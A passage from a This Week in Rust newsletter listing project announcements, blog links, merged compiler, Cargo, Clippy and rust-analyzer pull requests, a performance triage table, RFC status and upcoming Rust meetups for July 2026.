<li><a href="https://github.com/TeamXcelerator/xcelerator-solver/releases/tag/v0.1.0">Xcelerator Solver v0.1.0 -- deterministic symbolic regression</a></li>
<li><a href="https://github.com/tkmsikd/dlt-tui/releases/tag/v1.1.0">dlt-tui 1.1.0 - a fast TUI viewer for automotive DLT (AUTOSAR Diagnostic Log and Trace) files</a></li>
<li><a href="https://github.com/shihuili1218/rssh/releases/tag/v0.2.11">RSSH v0.2.11 — terminal workflows, safer SSH key import, and observable AI ops</a></li>
<li><a href="https://blog.none.at/blog/2026/2026-07-06-k8s-scale-app-rs/">k8s-scale-app-rs: Scale or Restart a Kubernetes Deployment from a CronJob</a></li>
<li><a href="https://dev.to/sicklefire/m-vis-v050-rc1-update-11cp">M-vis v0.5.0-rc1 update</a></li>
<li><a href="https://ganeshsivakumar.substack.com/p/flaredb">FlareDB: An Apache Beam Native Streaming Database built in Rust</a></li>
<li><a href="https://holovskyi.github.io/blog/typed-mqtt-topics-for-rust/">mqtt-typed-client 0.2: a type-safe async MQTT client on rumqttc</a></li>
<li><a href="https://github.com/LeChatP/RootAsRole/releases/tag/v4.0.0">RootAsRole: v4.0.0 Major release, secure execution, new logo</a></li>
<li><a href="https://www.qt.io/blog/rust-ui-framework-via-bridging-technology">A Cross-Platform Rust UI Framework via Qt’s Bridging Technology</a></li>
<li><a href="https://rapha.land/jam-programming-language/">Jam Programming Language</a></li>
<li><a href="https://www.clever.cloud/blog/company/2026/07/01/sozu-2-1-0-udp-load-balancer-programmable-edge/">Sōzu 2.1.0: UDP load balancing for the programmable edge</a></li>
<li><a href="https://op3kay.dev/writing/b0nker">b0nker: a minimal container runtime written in Rust</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li>[video] <a href="https://www.youtube.com/watch?v=SGR5qBdwk30">Rust Berlin Meetup 25/06/2026 Livestream</a></li>
<li>[video] <a href="https://www.youtube.com/live/_LtgHxuysUo">How do you rewrite C/C++ projects to Rust? – JetBrains interview with Luca Palmieri, Mainmatter</a></li>
<li><a href="https://kerkour.com/rustcrypto-slow-simd-rust">Investigating why RustCrypto is slow: Deep dive into SIMD instructions and hardware acceleration</a></li>
<li><a href="https://parsa.wtf/cast/">bool as u32</a></li>
<li><a href="https://arxiv.org/html/2605.30106">A Rust-to-Lean Verification Pipeline with AI Provers: An Experience Report</a></li>
<li><a href="https://blog.dureuill.net/articles/wip/">Work In Progress Rust</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=Fk165jYfHpc">OpenAI just spent $600k on Rust</a></li>
<li>[audio] <a href="https://corrode.dev/podcast/s06e07-rising-academies/">Rising Academies with Dylan Brown - Rust in Production Podcast</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li>[series] <a href="https://aibodh.com/posts/bevy-tutorial-build-your-first-3d-editor-in-rust/">Bevy Tutorial: Build Your First 3D Editor - Create a 3D Space on an Infinite Grid</a></li>
<li><a href="https://blog.sheerluck.dev/posts/learn-axum-basics-and-routing-by-building-a-url-shortener/">Learn Axum Basics and Routing by Building a URL Shortener</a></li>
<li>[series] <a href="https://plabayo.tech/blog/rama-101-1-https-clients-and-abstractions">Rama 101.1: HTTPS clients and layers of abstraction</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#miscellaneous">Miscellaneous</a></h5>
<ul>
<li><a href="https://seanborg.tech/tiny-blog/rust-week-ven-diagram/">Clickable euler diagram of all the Rust week talks</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://crates.io/crates/apis-saltans-core">apis-saltans</a>, a Zigbee implementation including a coordinator API.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1627">Richard Neumann</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>

<p>* <a href="https://github.com/name970/Protocol/issues/4">Protocol - Extend bit-exactness tests to f64 reconstruction targets</a>                                                                          <br>
* <a href="https://github.com/lenra-io/dofigen/issues/278">Dofigen - No image tag replacement flag for the generate command</a></p>


<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>598 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-06-30..2026-07-07">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/156976">enable eager <code>param_env</code> norm in new solver</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156379">lint on <code>core::ffi::c_void</code> as a return type</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158577">polish some macro parsing code</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158604">resolve: no allocation in <code>resolve_ident_in(_local)_module_*</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158627">simplify option-iterator flattening in the compiler</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157857">stabilize <code>#[my_macro] mod foo;</code> (part of <code>proc_macro_hygiene</code>)</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158537">add <code>std::io::cursor::WriteThroughCursor</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157347">implement <code>Box::as_non_null()</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156737">implement <code>DoubleEndedIterator::next_chunk_back</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/134021">implement <code>IntoIterator</code> for <code>[&amp;[mut]] Box&lt;[T; N], A&gt;</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158427">implement <code>ptr::{read,write}_unaligned</code> via <code>repr(packed)</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158539">move <code>SizeHint</code> and <code>IoHandle</code> to <code>core::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158540">move <code>std::io::Seek</code> to <code>core::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158704">optimize <code>ArrayChunks::try_rfold</code> with <code>DoubleEndedIterator::next_chunk_back</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158573">stabilize <code>feature(atomic_from_mut)</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17135"><code>bindeps</code>: register transitive artifact targets</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17167">avoid cloning parsed TOML manifest in <code>ManifestErrorContext</code></a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17176">avoid extra clone of parsed TOML manifest</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17178">remove unneeded cloning when parsing package index</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17169">change HashMaps and HashSets in Cargo to use Fxhasher</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17174">do not pass lint rustflags when <code>--cap-lints=allow</code> is set</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17164">fixed <code>Compilation::deps_output</code> only taking the last dep</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17177">pre-allocate a few vectors</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/16807">stabilize <code>build-dir</code> layout v2</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17180">use a set when checking visited workspace members</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rustdoc">Rustdoc</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158751">fix crash when trying to inline foreign item which cannot have attributes</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158334">show use-site paths for unevaluated const array lengths</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17319"><code>chunks_exact_to_as_chunks</code>: Don't report expressions with const parameters</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17360"><code>chunks_exact_to_as_chunks</code>: Don't report expressions with type params</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17309"><code>missing_trait_methods</code>: MSRV/unstable awareness</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17289"><code>vec_init_then_push</code>: don't lint pushes from a macro expansion</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17346"><code>inline_modules</code>: ignore <code>cfg(test)</code> modules in test builds</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17345"><code>match_same_arms</code>: keep arm-level expectations working under an outer allow</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17341"><code>unnecessary_operation</code>: avoid bad <code>!</code> suggestions</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17351"><code>unnecessary_unwrap_unchecked</code>: don't trigger inside the <code>_unchecked</code> fn</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17348">add required parentheses when the <code>needless_bool</code> suggestion is an operand</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17353">fix ICE when resolving local in <code>unnecessary_unwrap_unchecked</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17311">fix <code>infinite_loop</code> false positive inside gen blocks</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17358">fix <code>manual_c_str_literals</code> suggestion when the trailing backslash is escaped</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17337">fix <code>strlen_on_c_strings</code> incorrect suggestion logic</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17323">fix <code>suspicious_operation_groupings</code> duplications</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16902">lint bit width</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17338">optimize <code>Msrv::meets</code> calls</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17273">bail out of unicode lint scans when the snippet is pure ASCII</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17224">skip the HIR parent walk in <code>is_in_test_function</code> when there are no test items</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17366">place generated impl block after the existing impl block</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17333">refactor <code>StringAdd</code> lint pass</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17334">refactor <code>suspicious_xor_used_as_pow</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17293">remove <code>lower_ty</code> in <code>uninhabited_reference</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17328">respect the configured MSRV in <code>manual_is_variant_and</code>'s <code>map() == Some(_)</code> rewrite</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17332">rewrite <code>mut_mut</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17329">rewrite <code>redundant_else</code> as a late pass</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17354">rewrite <code>tuple_array_conversions</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22595">SCIP: exclude leading/trailing trivia in definition ranges</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22708">SCIP: remove dead <code>inlay_hints</code> field</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22433"><code>feat(ide-diagnostics)</code>: add diagnostics for invalid union patterns (E0784)</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22704"><code>internal(query-group-macro)</code>: remove the arity test</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22668">add tree top method to Syntax node</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22665">add handler for E0627</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22231">supports multi arms for <code>replace_match_with_if_let</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22690">fix UB in <code>smol_str borsh_non_utf8</code> test cases</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/20362">fix generic param for <code>generate_default_from_enum_variant</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22703"><code>walkthrough_create_project</code> file not packaged</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22677">assertion failure on closure with unbound function</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22613">avoid panic in <code>convert_tuple_struct_to_named_struct</code> on nested pattern usage</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22649">configuration syntax for nvim-lsp</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22706">correct resolution to value when it shares the same name with type</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22619">exclude impls on the error type from impl enumeration</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22705">fix crash on <code>extract_variable</code> when selecting unresolved macro call</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22715">fix crash on completion inside macros</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22673">fix handling of params of coroutine fns</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22675">handle more cases of cfgs in expr store lowering</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22488">no generate with default assoc item</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22674">panics in <code>unwrap_return_type</code>, <code>remove_underscore</code>, and <code>promote_local_to_const</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22711">hoist attribute qualifier segment collection</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22709">reduce parser joint-token allocation</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22676">project-model: don't pass metadata extra args to sysroot</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22679">project-model: introduce cargo.configPath</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22581">provide startup time to ready log point and associated benchmark</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>This week was dominated by wild swings in benchmarks of the new-solver, which is not enabled by default, yet.
Apart from that, we got a very few notable changes, only one unexpected speedup from a bugfix in rustdoc.</p>
<p>Triage done by <strong>@panstromek</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=7dc2c162b9c197aaa76a6f9e7534569537830a01&amp;end=3659db0d3e2cd634c766fcda79ed118eca31a9fd&amp;absolute=false&amp;stat=instructions%3Au">7dc2c162..3659db0d</a></p>
<p><strong>Summary</strong>:</p>
<table>
<thead>
<tr>
<th>(instructions:u)</th>
<th>mean</th>
<th>range</th>
<th>count</th>
</tr>
</thead>
<tbody>
<tr>
<td>Regressions ❌ <br> (primary)</td>
<td>0.2%</td>
<td>[0.2%, 0.2%]</td>
<td>3</td>
</tr>
<tr>
<td>Regressions ❌ <br> (secondary)</td>
<td>162.1%</td>
<td>[0.2%, 1116.3%]</td>
<td>20</td>
</tr>
<tr>
<td>Improvements ✅ <br> (primary)</td>
<td>-1.4%</td>
<td>[-8.4%, -0.1%]</td>
<td>7</td>
</tr>
<tr>
<td>Improvements ✅ <br> (secondary)</td>
<td>-1.1%</td>
<td>[-8.4%, -0.1%]</td>
<td>11</td>
</tr>
<tr>
<td>All ❌✅ (primary)</td>
<td>-0.9%</td>
<td>[-8.4%, 0.2%]</td>
<td>10</td>
</tr>
</tbody>
</table>
<p>1 Regression, 1 Improvement, 4 Mixed; 3 of them in rollups
17 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/9f1bc6e374b5ae202366df1cbef850b79be8c641/triage/2026/2026-07-06.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158522">Lint against invalid POSIX symbol definitions</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158325">Document NonNull layout guarantees</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/112811">Tracking Issue for <code>slice_split_once</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1011">Let the OS handle stack growth</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1010">Add <code>target_feature_available_at_call_site</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#language-reference"></a><a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>
<ul>
<li><a href="https://github.com/rust-lang/reference/pull/2293">Empty repr(Rust) enums are ZSTs</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a>,
<a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>,
<a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a> or
<a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>.</em></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3982">Update RFC template</a></li>
<li><a href="https://github.com/rust-lang/rfcs/pull/3981">RFC: Store registry tokens in the OS credential store by default</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-07-08 - 2026-08-05 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-07-08 | Virtual (Cardiff, GB) | <a href="https://www.meetup.com/rust-and-c-plus-plus-in-cardiff/events/">Rust and C++ Cardiff</a></li>
<li><a href="https://www.meetup.com/rust-and-c-plus-plus-in-cardiff/events/315506435/"><strong>Operating Systems Book Club: Introduction + Processes</strong></a></li>
<li>2026-07-08 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/jv9lom12"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-09 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris/events/">Rust Nuremberg</a></li>
<li><a href="https://www.meetup.com/rust-noris/events/315517604/"><strong>Rust Nürnberg online</strong></a></li>
<li>2026-07-14 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/310254778/"><strong>Second Tuesday</strong></a></li>
<li>2026-07-15 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/21k797xr"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a></li>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a></li>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
<li>2026-07-16 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/312045926/"><strong>Rust Hack and Learn</strong></a></li>
<li>2026-07-19 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/314329045/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
<li>2026-07-21 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a></li>
<li><a href="https://www.meetup.com/women-in-rust/events/315102297/"><strong>Lunch &amp; Learn: Learning Rust as First Programming Language</strong></a></li>
<li>2026-07-21 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a></li>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
<li>2026-07-22 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/hd8mlw56"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-28 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/310254777/"><strong>Fourth Tuesday</strong></a></li>
<li>2026-07-29 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/uo5ek1f4"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-30 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/312045928/"><strong>Rust Hack and Learn</strong></a></li>
<li>2026-08-02 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust/events/">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/314095294/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
<li>2026-08-04 | Virtual (London, GB) | <a href="https://www.meetup.com/women-in-rust/events/">Women in Rust</a></li>
<li><a href="https://www.meetup.com/women-in-rust/events/315213885/"><strong>👋 Community Catch Up</strong></a></li>
<li>2026-07-29 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/ii2jrwva"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-08-05 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs/events/">Indy Rust</a></li>
<li><a href="https://www.meetup.com/indyrs/events/315210367/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#asia">Asia</a></h5>
<ul>
<li>2026-07-18 | Bangalore, IN | <a href="https://hasgeek.com/rustbangalore">Rust Bangalore</a></li>
<li><a href="https://hasgeek.com/rustbangalore/july-2026-rustacean-meetup/"><strong>July 2026 Rustacean Meetup</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#africa">Africa:</a></h5>
<ul>
<li>2026-07-14 | Johannesburg, ZA | <a href="https://www.meetup.com/johannesburg-rust-meetup/events/">Johannesburg Rust Meetup</a></li>
<li><a href="https://www.meetup.com/johannesburg-rust-meetup/events/315573758/"><strong>Debugging a production grade Open Source Rust crate</strong></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-07-08 | Dublin, IE | <a href="https://www.meetup.com/rust-dublin">Rust Dublin</a></li>
<li><a href="https://www.meetup.com/rust-dublin/events/315150327/"><strong>Join us live and INPERSON for Rust 262</strong></a></li>
<li>2026-07-09 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/315585121/"><strong>Rust Berlin on location 🏳️‍🌈 - Edition 015</strong></a></li>
<li>2026-07-09 | Frankfurt, DE | <a href="https://www.meetup.com/rust-rhein-main/events/">Rust Rhein-Main</a></li>
<li><a href="https://www.meetup.com/rust-rhein-main/events/315366165/"><strong>Building Cross Platform Applications with Ply</strong></a></li>
<li>2026-07-09 | Switzerland, CH | <a href="https://www.posttenebraslab.ch/wiki/events/start">PostTenebrasLab</a></li>
<li><a href="https://www.posttenebraslab.ch/wiki/events/monthly_meeting/rust_meetup"><strong>Rust Meetup Geneva</strong></a></li>
<li>2026-07-15 | Dortmund, DE | <a href="https://www.meetup.com/rust-dortmund/events/">Rust Dortmund</a></li>
<li><a href="https://www.meetup.com/rust-dortmund/events/315496876/"><strong>Teach and Hack at Projektspeicher</strong></a></li>
<li>2026-07-21 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a></li>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313816470/"><strong>Supercharge Rust funcs with implicit arguments and context-generic programming</strong></a></li>
<li>2026-07-23 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/315484101/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
<li>2026-07-23 | London, UK | <a href="https://www.meetup.com/london-rust-project-group">London Rust Project Group</a></li>
<li><a href="https://www.meetup.com/london-rust-project-group/events/315366453/"><strong>Rama modular service framework for Rust</strong></a></li>
<li>2026-07-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a></li>
<li><a href="https://www.meetup.com/rust-paris/events/315309633/"><strong>Rust meetup #87</strong></a></li>
